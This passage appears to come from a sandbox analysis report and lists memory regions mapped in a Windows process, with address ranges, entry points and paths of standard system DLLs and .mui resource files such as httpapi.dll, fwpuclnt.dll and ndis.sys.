Region: id = 3688 start_va = 0xb30000 end_va = 0xb3afff monitored = 0 entry_point = 0xb311a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3691 start_va = 0xb40000 end_va = 0xb41fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3693 start_va = 0xb30000 end_va = 0xb3afff monitored = 0 entry_point = 0xb311a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3694 start_va = 0xb40000 end_va = 0xb41fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3695 start_va = 0xb30000 end_va = 0xb3afff monitored = 0 entry_point = 0xb311a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3696 start_va = 0xb40000 end_va = 0xb41fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3697 start_va = 0xb30000 end_va = 0xb3afff monitored = 0 entry_point = 0xb311a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3698 start_va = 0xb40000 end_va = 0xb41fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3699 start_va = 0xb30000 end_va = 0xb3afff monitored = 0 entry_point = 0xb311a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3700 start_va = 0xb40000 end_va = 0xb41fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3701 start_va = 0xb30000 end_va = 0xb3afff monitored = 0 entry_point = 0xb311a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3702 start_va = 0xb40000 end_va = 0xb41fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3703 start_va = 0xb30000 end_va = 0xb3dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3706 start_va = 0xb40000 end_va = 0xb4dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3708 start_va = 0xb30000 end_va = 0xb3dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3709 start_va = 0xb40000 end_va = 0xb4dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3710 start_va = 0x1260000 end_va = 0x2054fff monitored = 0 entry_point = 0x1343268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3714 start_va = 0x1260000 end_va = 0x2054fff monitored = 0 entry_point = 0x1343268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3715 start_va = 0xb30000 end_va = 0xbd9fff monitored = 0 entry_point = 0xb44100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3716 start_va = 0xc60000 end_va = 0xc63fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3717 start_va = 0xb30000 end_va = 0xbd9fff monitored = 0 entry_point = 0xb44100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3718 start_va = 0xc60000 end_va = 0xc63fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3719 start_va = 0xb30000 end_va = 0xb77fff monitored = 0 entry_point = 0xb6fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3722 start_va = 0xb80000 end_va = 0xb82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3723 start_va = 0xb30000 end_va = 0xb77fff monitored = 0 entry_point = 0xb6fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3724 start_va = 0xb80000 end_va = 0xb82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3725 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3727 start_va = 0xb30000 end_va = 0xb38fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3728 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3729 start_va = 0xb30000 end_va = 0xb38fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3730 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3731 start_va = 0xb30000 end_va = 0xb38fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3732 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3733 start_va = 0xb30000 end_va = 0xb38fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3734 start_va = 0xb30000 end_va = 0xb81fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32.dll.mui") Region: id = 3737 start_va = 0x1260000 end_va = 0x13acfff monitored = 0 entry_point = 0x1362a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3740 start_va = 0xb90000 end_va = 0xb95fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3741 start_va = 0x1260000 end_va = 0x13acfff monitored = 0 entry_point = 0x1362a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3742 start_va = 0xb90000 end_va = 0xb95fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3743 start_va = 0xb90000 end_va = 0xb9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3746 start_va = 0xde0000 end_va = 0xe39fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3748 start_va = 0xb90000 end_va = 0xb9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3749 start_va = 0xde0000 end_va = 0xe39fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3750 start_va = 0xb90000 end_va = 0xb9ffff monitored = 0 entry_point = 0xb9a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3752 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3753 start_va = 0xb90000 end_va = 0xb9ffff monitored = 0 entry_point = 0xb9a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3754 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3755 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3756 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3757 start_va = 0xbb0000 end_va = 0xbb5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3759 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3760 start_va = 0xbb0000 end_va = 0xbb5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3761 start_va = 0xde0000 end_va = 0xe33fff monitored = 0 entry_point = 0xdf3450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3762 start_va = 0xb90000 end_va = 0xb91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3763 start_va = 0xde0000 end_va = 0xe33fff monitored = 0 entry_point = 0xdf3450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3764 start_va = 0xb90000 end_va = 0xb91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3765 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3766 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3767 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3768 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3769 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3770 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3771 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3772 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3774 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3775 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3776 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3777 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3778 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3779 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3780 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3781 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3782 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3783 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3784 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3785 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3786 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3787 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3788 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3789 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3790 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3791 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3792 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xbd68c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3793 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3794 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xbd68c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3795 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3796 start_va = 0xde0000 end_va = 0xebbfff monitored = 0 entry_point = 0xe55ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3797 start_va = 0xb90000 end_va = 0xb90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3798 start_va = 0xde0000 end_va = 0xebbfff monitored = 0 entry_point = 0xe55ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3799 start_va = 0xb90000 end_va = 0xb90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3800 start_va = 0xde0000 end_va = 0xec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3801 start_va = 0xb90000 end_va = 0xbb8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3802 start_va = 0xde0000 end_va = 0xec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3803 start_va = 0xb90000 end_va = 0xbb8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3804 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3805 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3806 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3807 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3808 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3809 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3810 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3811 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3812 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3813 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3815 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3816 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3817 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3818 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3819 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3820 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: 